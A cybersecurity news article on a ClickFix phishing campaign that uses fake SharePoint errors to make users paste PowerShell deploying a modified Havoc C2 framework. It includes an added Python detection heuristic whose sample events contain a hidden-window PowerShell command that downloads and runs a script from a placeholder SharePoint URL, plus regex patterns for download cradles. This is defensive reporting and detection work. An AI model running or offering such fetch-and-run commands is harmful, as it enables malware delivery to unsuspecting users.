ClickFix Phishing Campaign Deploys Havoc Malware Through Microsoft SharePoint

Cybercriminals use fake SharePoint error messages to disguise malicious commands.

Published: Mar 04, 2025


Key Takeaways:

  • A newly discovered phishing campaign targets Microsoft SharePoint accounts using the ClickFix technique.
  • The attackers leverage the Havoc C2 framework to gain full control over compromised systems.
  • The hackers trick users into executing malicious PowerShell commands.

Cybersecurity researchers have discovered a sophisticated phishing campaign targeting Microsoft SharePoint accounts, using a deceptive technique called ClickFix. This attack exploits user trust to execute malicious commands, deploying the powerful Havoc command-and-control (C2) framework to seize full control over compromised systems.

The ClickFix cyberattack technique involves tricking users into executing malicious PowerShell commands by presenting them with a fake error message delivered via phishing email. The user is instructed to copy and paste the command, which then downloads and runs malware, allowing hackers to steal data and maintain control over the system.

The Havoc Framework is an open-source post-exploitation command-and-control (C2) framework designed for cybersecurity professionals and researchers. It lets operators manage compromised systems and carry out post-exploitation tasks, and it supports features such as payload generation, HTTP/HTTPS listeners, and a range of built-in post-exploitation commands.

How does the phishing campaign exploit Havoc C2 to take over systems?

The ClickFix campaign was first discovered by researchers from FortiGuard Labs. The attackers leverage the Microsoft Graph API within SharePoint to hide their malicious command-and-control (C2) communications. The phishing emails instruct the recipient to review a restricted notice, which requires them to open an attached HTML document (Documents.html).

Once opened, the HTML document shows a fake error message asking the user to update the DNS cache manually. Clicking the “How to fix” button copies a PowerShell command to the Windows clipboard, and the user is instructed to paste it into PowerShell on their system. This command launches another PowerShell script hosted on the SharePoint server, which executes the malicious Havoc code.

The final payload is a customized version of the Havoc framework. The threat actors use the Microsoft Graph API within SharePoint to disguise their command-and-control communications. With this modified Havoc framework, the attackers can gain complete control over the compromised system.
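The execution chain described above (a user-pasted PowerShell one-liner that fetches a second-stage script from SharePoint) leaves a recognizable process-creation footprint that defenders can hunt for. The following detection sketch is an added example, not code from the article, from FortiGuard Labs or from the Havoc project: it scores Sysmon-style process-creation records (the field names ParentImage, Image and CommandLine follow Sysmon Event ID 1) against a small set of ClickFix traits. The trait list, the weights, the alert threshold and the sample events are all constructed for illustration, and the heuristic is written to generalize beyond this campaign to any copy-and-paste lure that ends in a PowerShell download cradle.

```python
"""
Hypothetical ClickFix triage heuristic over Sysmon-style process-creation events.

Traits scored (all assumptions, not taken from the article):
  * PowerShell launched by an interactive parent (Explorer / Run box, cmd,
    Windows Terminal), which is what a user pasting a command looks like.
  * Download-cradle fragments in the command line (iex, iwr, hidden window,
    encoded command).
  * A SharePoint-hosted URL, matching the second-stage hosting described above.
"""
import re
from dataclasses import dataclass, field

# Parents that indicate a human typed or pasted the command. Assumption.
INTERACTIVE_PARENTS = ("explorer.exe", "cmd.exe", "windowsterminal.exe")
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# Each trait adds 2 points; a SharePoint URL adds 3 (see score_event).
CRADLE_PATTERNS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web-download": re.compile(
        r"downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(
        r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
SHAREPOINT_URL = re.compile(r"https?://[^\s'\"]*\.sharepoint\.com[^\s'\"]*", re.I)
ALERT_THRESHOLD = 5  # constructed: one strong trait alone should not page anyone


@dataclass
class Finding:
    record_id: int
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> Finding:
    """Score one process-creation record; only PowerShell launches are in scope."""
    finding = Finding(ev["RecordId"])
    if basename(ev["Image"]) not in POWERSHELL_IMAGES:
        return finding
    cmd = ev["CommandLine"]
    parent = basename(ev["ParentImage"])
    if parent in INTERACTIVE_PARENTS:
        finding.score += 2
        finding.reasons.append(f"powershell spawned by interactive parent {parent}")
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(cmd):
            finding.score += 2
            finding.reasons.append(f"download-cradle trait: {name}")
    url = SHAREPOINT_URL.search(cmd)
    if url:
        finding.score += 3
        finding.reasons.append(f"sharepoint-hosted url: {url.group(0)}")
    return finding


def triage(events) -> list:
    """Return only the findings that cross the alert threshold."""
    return [f for f in map(score_event, events) if f.alert]


# Constructed sample events; the SharePoint host name is a placeholder.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"RecordId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr "
                    "'https://contoso-example.sharepoint.com/sites/x/lure.ps1' "
                    "-UseBasicParsing).Content\""},
    {"RecordId": 4, "ParentImage": r"C:\Users\dev\AppData\Local\Microsoft\WindowsApps\WindowsTerminal.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -c \"Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip\""},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"record {f.record_id}: score {f.score}")
        for reason in f.reasons:
            print("   -", reason)
```

Only record 3 crosses the threshold: an interactive parent, a hidden window, iex, iwr and a SharePoint URL add up to 11, while the developer's interactive Invoke-WebRequest in record 4 stops at 4 and is left alone. The point of the additive scoring is that none of these traits is malicious on its own; the combination of a user-launched PowerShell, a cradle and an unexpected hosting location is what characterizes the lure.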

[Figure: attack flow (Image Credit: Microsoft)]

How to protect your organization against sophisticated phishing attacks?

FortiGuard Labs advises users to be extremely cautious with messages that prompt them to open a terminal or PowerShell, since such messages can be part of social engineering attacks designed to trick them into running malicious commands. That caution helps users avoid unintentionally downloading and executing harmful code.

Security teams are also advised to use AI-powered API security platforms to strengthen their defenses. These platforms analyze API traffic in real time, identify unusual patterns or anomalies, and proactively block malicious activity. Organizations should also adopt strong API posture governance, which involves several key practices to minimize the risk of similar attacks: strict authentication and authorization, least-privilege access, and continuous monitoring of API activity.
